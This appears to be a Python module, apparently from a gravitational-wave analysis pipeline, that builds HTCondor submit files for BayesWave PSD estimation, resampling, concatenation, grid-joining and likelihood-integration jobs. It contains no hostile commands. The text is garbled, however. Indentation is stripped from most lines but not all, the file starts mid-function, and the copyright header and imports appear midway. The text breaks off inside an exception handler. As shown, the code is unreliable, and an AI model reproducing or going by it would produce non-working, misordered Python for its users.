# ile_job.add_opt("samples",name) # do not add in usual fashion, because otherwise the key's value is overwritten
ile_job.add_opt("samples " + name,'')
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
    except KeyError:
        print(" LIGO accounting information not available. You must add this manually to %s !" % ile_sub_name)
return ile_job, ile_sub_name
def write_plot_sub(tag='converge', exe=None,samples_files=None, base=None,target=None,arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a final plot. Note the user can in principle specify several samples (e.g., several iterations, if we want to diagnose them)
"""
exe = exe or which("plot_posterior_corner.py")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# Add options for two parameter files
for name in samples_files:
# ile_job.add_opt("samples",name) # do not add in usual fashion, because otherwise the key's value is overwritten
ile_job.add_opt("posterior-file " + name,'')
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
    except KeyError:
        print(" LIGO accounting information not available. You must add this manually to %s !" % ile_sub_name)
return ile_job, ile_sub_name
def write_init_sub(tag='gridinit', exe=None,arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a grid initialization job.
Note this routine MUST create whatever files are needed by the ILE iteration
"""
exe = exe or which("util_ManualOverlapGrid.py")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
    except KeyError:
        print(" LIGO accounting information not available. You must add this manually to %s !" % ile_sub_name)
return ile_job, ile_sub_name
def write_psd_sub_BW_monoblock(tag='PSD_BW_mono', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,universe='local',no_grid=False,**kwargs):
"""
Write a submit file for constructing the PSD using BW
Modern argument syntax for BW
Note that *all ifo-specific results must be set outside this loop*, to work sensibly, and passed as an argument
Inputs:
- channel_dict['H1'] = [channel_name, flow_ifo]
Outputs:
- An instance of the CondorDAGJob that was generated for BW
"""
exe = exe or which("BayesWave")
if exe is None:
print(" BayesWave not available, hard fail ")
        sys.exit(1)  # exit nonzero on failure
frames_local = None
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Loop over IFOs
# You should only have one, in the workflow for which this is intended
# Problem:
ile_job.add_arg("$(macroargument0)")
#
# Add mandatory options
ile_job.add_opt('Niter', '1000100')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Dmax', '200') # limit number of dimensions in model
ile_job.add_opt('resume', '')
ile_job.add_opt('progress', '')
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('psdlength', str(psd_length))
ile_job.add_opt('srate', str(srate))
ile_job.add_opt('outputDir', 'output_$(ifo)')
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
    except KeyError:
        print(" LIGO accounting information not available. You must add this manually to %s !" % ile_sub_name)
return ile_job, ile_sub_name
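# Usage sketch (illustrative; the GPS time and per-IFO argument string are
# hypothetical). One BayesWave job is created per IFO; everything IFO-specific is
# passed through the $(macroargument0) macro, as noted in the docstring above:
#
#   bw_job, bw_sub = write_psd_sub_BW_monoblock(tag='PSD_BW_mono', log_dir='logs/',
#       event_time=1126259462.4, psd_length=4, srate=4096)
#   node = pipeline.CondorDAGNode(bw_job)
#   node.add_macro("ifo", "H1")   # used by the output_$(ifo) directory name
#   node.add_macro("macroargument0",
#       "--ifo H1 --H1-channel H1:GDS-CALIB_STRAIN --H1-cache local.cache --H1-flow 20")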
def write_psd_sub_BW_step1(tag='PSD_BW_post', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,channel_dict=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
- channel_dict['H1'] = [channel_name, flow_ifo]
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
exe = exe or which("BayesWavePost")
if exe is None:
print(" BayesWavePost not available, hard fail ")
import sys
        sys.exit(1)  # exit nonzero on failure
frames_local = None
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add mandatory options
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Niter', '4000000')
ile_job.add_opt('Nbayesline', '2000')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('srate', str(srate))
#
# Loop over IFOs
# Not needed, can do one job per PSD
# ile_job.add_opt("ifo","$(ifo)")
# ile_job.add_opt("$(ifo)-cache",cache_file)
for ifo in channel_dict:
channel_name, channel_flow = channel_dict[ifo]
ile_job.add_arg("--ifo "+ ifo) # need to prevent overwriting!
ile_job.add_opt(ifo+"-channel", ifo+":"+channel_name)
ile_job.add_opt(ifo+"-cache", cache_file)
ile_job.add_opt(ifo+"-flow", str(channel_flow))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
    except KeyError:
        print(" LIGO accounting information not available. You must add this manually to %s !" % ile_sub_name)
return ile_job, ile_sub_name
def write_psd_sub_BW_step0(tag='PSD_BW', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,channel_dict=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
- channel_dict['H1'] = [channel_name, flow_ifo]
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
exe = exe or which("BayesWave")
if exe is None:
print(" BayesWave not available, hard fail ")
        sys.exit(1)  # exit nonzero on failure
frames_local = None
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add mandatory options
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Niter', '4000000')
ile_job.add_opt('Nbayesline', '2000')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('srate', str(srate))
#
# Loop over IFOs
for ifo in channel_dict:
channel_name, channel_flow = channel_dict[ifo]
ile_job.add_arg("--ifo " + ifo)
ile_job.add_opt(ifo+"-channel", ifo+":"+channel_name)
ile_job.add_opt(ifo+"-cache", cache_file)
ile_job.add_opt(ifo+"-flow", str(channel_flow))
ile_job.add_opt(ifo+"-timeslide", str(0.0))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
    except KeyError:
        print(" LIGO accounting information not available. You must add this manually to %s !" % ile_sub_name)
return ile_job, ile_sub_name
def write_resample_sub(tag='resample', exe=None, file_input=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
Write a submit file for launching a 'resample' job
util_ResampleILEOutputWithExtrinsic.py
"""
exe = exe or which("util_ResampleILEOutputWithExtrinsic.py") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
if not(arg_str is None or len(arg_str)<2):
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_opt('fname',file_input)
ile_job.add_opt('fname-out',file_output)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(file_output)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
    except KeyError:
        print(" LIGO accounting information not available. You must add this manually to %s !" % ile_sub_name)
return ile_job, ile_sub_name
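# Usage sketch (illustrative; file names are hypothetical):
#
#   res_job, res_sub = write_resample_sub(tag='resample',
#       file_input='extrinsic_posterior_samples.dat',
#       file_output='extrinsic_posterior_samples.resampled.dat', log_dir='logs/')
#   res_job.write_sub_file()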
def write_cat_sub(tag='cat', exe=None, file_prefix=None,file_postfix=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
    Write a submit file for launching a 'cat' job: concatenate and deduplicate per-worker output files
    via a generated catjob.sh wrapper (find/cat/sort/uniq, plus a switcheroo header fix)
"""
exe = exe or which("find") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
exe_switch = which("switcheroo") # tool for patterend search-replace, to fix first line of output file
cmdname = 'catjob.sh'
with open(cmdname,'w') as f:
f.write("#! /bin/bash\n")
f.write(exe+" . -name '"+file_prefix+"*"+file_postfix+"' -exec cat {} \; | sort -r | uniq > "+file_output+";\n")
f.write(exe_switch + " 'm1 ' '# m1 ' "+file_output) # add standard prefix
os.system("chmod a+x "+cmdname)
ile_job = pipeline.CondorDAGJob(universe=universe, executable='catjob.sh')
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# ile_job.add_arg(" . -name '" + file_prefix + "*" +file_postfix+"' -exec cat {} \; ")
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
    except KeyError:
        print(" LIGO accounting information not available. You must add this manually to %s !" % ile_sub_name)
return ile_job, ile_sub_name
def write_convertpsd_sub(tag='convert_psd', exe=None, ifo=None,file_input=None,target_dir=None,arg_str='',log_dir=None, universe='local',**kwargs):
"""
Write script to convert PSD from one format to another. Needs to be called once per PSD file being used.
"""
exe = exe or which("convert_psd_ascii2xml") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
ile_job.add_opt("fname-psd-ascii",file_input)
ile_job.add_opt("ifo",ifo)
ile_job.add_arg("--conventional-postfix")
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if not (target_dir is None):
# Copy output PSD into place
ile_job.add_condor_cmd("+PostCmd", '" cp '+ifo+'-psd.xml.gz ' + target_dir +'"')
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
    except KeyError:
        print(" LIGO accounting information not available. You must add this manually to %s !" % ile_sub_name)
return ile_job, ile_sub_name
def write_joingrids_sub(tag='join_grids', exe=None, universe='vanilla', input_pattern=None,target_dir=None,output_base=None,log_dir=None,n_explode=1, gzip="/usr/bin/gzip", old_add=True, **kwargs):
"""
    Write a submit file for joining the per-worker ("exploded") grid XML files into a single grid, using ligolw_add.
"""
exe = exe or which("ligolw_add") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
# exe_here = "my_join.sh"
# with open(exe_here,'w') as f:
# f.write("#! /bin/bash \n")
# f.write(r"""
# #!/bin/bash
# # Modules and scripts run directly from repository
# # Note the repo and branch are self-referential ! Not a robust solution long-term
# # Exit on failure:
# # set -e
# {} {} > {}/{}.xml
# gzip {}.{}.xml""".format(exe,input_pattern,target_dir,output_base,target_dir,output_base) )
# os.system("chmod a+x "+exe_here)
# exe = exe_here # update executable
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
fname_out =target_dir + "/" +output_base + ".xml.gz"
ile_job.add_arg("--output="+fname_out)
working_dir = log_dir.replace("/logs", '') # assumption about workflow/naming! Danger!
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# ile_job.set_stdout_file(fname_out)
# ile_job.add_condor_cmd("+PostCmd", ' "' + gzip + ' ' +fname_out + '"')
explode_str = ""
for indx in np.arange(n_explode):
explode_str+= " {}/{}-{}.xml.gz ".format(working_dir,output_base,indx)
explode_str += " {}/{}.xml.gz ".format(working_dir,output_base)
ile_job.add_arg(explode_str)
# ile_job.add_arg("overlap-grid*.xml.gz") # working in our current directory
if old_add:
ile_job.add_opt("ilwdchar-compat",'') # needed?
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
    except KeyError:
        print(" LIGO accounting information not available. You must add this manually to %s !" % ile_sub_name)
return ile_job, ile_sub_name
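# Usage sketch (illustrative; the directory layout and explode count are
# hypothetical). Joins overlap-grid-0..3.xml.gz plus the base grid into one file:
#
#   join_job, join_sub = write_joingrids_sub(tag='join_grids',
#       target_dir='iteration_1', output_base='overlap-grid',
#       log_dir='iteration_1/logs/', n_explode=4)
#   join_job.write_sub_file()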
def write_subdagILE_sub(tag='subdag_ile', exe=None, universe='vanilla', submit_file=None,input_pattern=None,target_dir=None,output_suffix=None,log_dir=None,sim_xml=None, **kwargs):
"""
    Write a submit file for the job that generates the per-iteration ILE sub-DAG (create_ile_sub_dag.py).
"""
exe = exe or which("create_ile_sub_dag.py")
subfile = submit_file or 'ILE.sub'
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
ile_job.add_arg("--target-dir "+target_dir)
ile_job.add_arg("--output-suffix "+output_suffix)
ile_job.add_arg("--submit-script "+subfile)
ile_job.add_arg("--macroiteration $(macroiteration)")
ile_job.add_arg("--sim-xml "+sim_xml)
working_dir = log_dir.replace("/logs", '') # assumption about workflow/naming! Danger!
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# ile_job.set_stdout_file(fname_out)
# ile_job.add_condor_cmd("+PostCmd", ' "' + gzip + ' ' +fname_out + '"')
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
    except KeyError:
        print(" LIGO accounting information not available. You must add this manually to %s !" % ile_sub_name)
return ile_job, ile_sub_name
# Copyright (C) 2013 Evan Ochsner
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 2 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
A collection of routines to manage Condor workflows (DAGs).
"""
import os, sys
import numpy as np
from time import time
from hashlib import md5
from glue import pipeline
__author__ = "Evan Ochsner <[email protected]>, Chris Pankow <[email protected]>"
# Taken from
# http://pythonadventures.wordpress.com/2011/03/13/equivalent-of-the-which-command-in-python/
def is_exe(fpath):
return os.path.exists(fpath) and os.access(fpath, os.X_OK)
def which(program):
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file): return exe_file
return None
def mkdir(dir_name):
try :
os.mkdir(dir_name)
except OSError:
pass
def generate_job_id():
"""
Generate a unique md5 hash for use as a job ID.
Borrowed and modified from the LAL code in glue/glue/pipeline.py
"""
t = str( int( time() * 1000 ) )
r = str( int( np.random.random() * 100000000000000000 ) )
    return md5((t + r).encode()).hexdigest()  # encode: hashlib requires bytes under python3
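# Usage sketch (illustrative): the hash is handy for building a unique scratch
# directory for a run, e.g.
#
#   run_id = generate_job_id()
#   mkdir("run_" + run_id)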
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
def write_integrate_likelihood_extrinsic_grid_sub(tag='integrate', exe=None, log_dir=None, ncopies=1, **kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over
extrinsic parameters.
Like the other case (below), but modified to use the sim_xml
and loop over 'event'
Inputs:
- 'tag' is a string to specify the base name of output files. The output
submit file will be named tag.sub, and the jobs will write their
output to tag-ID.out, tag-ID.err, tag.log, where 'ID' is a unique
identifier for each instance of a job run from the sub file.
- 'cache' is the path to a cache file which gives the location of the
data to be analyzed.
- 'sim' is the path to the XML file with the grid
- 'channelH1/L1/V1' is the channel name to be read for each of the
H1, L1 and V1 detectors.
- 'psdH1/L1/V1' is the path to an XML file specifying the PSD of
each of the H1, L1, V1 detectors.
- 'ncopies' is the number of runs with identical input parameters to
submit per condor 'cluster'
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
assert len(kwargs["psd_file"]) == len(kwargs["channel_name"])
exe = exe or which("integrate_likelihood_extrinsic")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
#
# Macro based options
#
ile_job.add_var_opt("event")
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', '2048')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
    except KeyError:
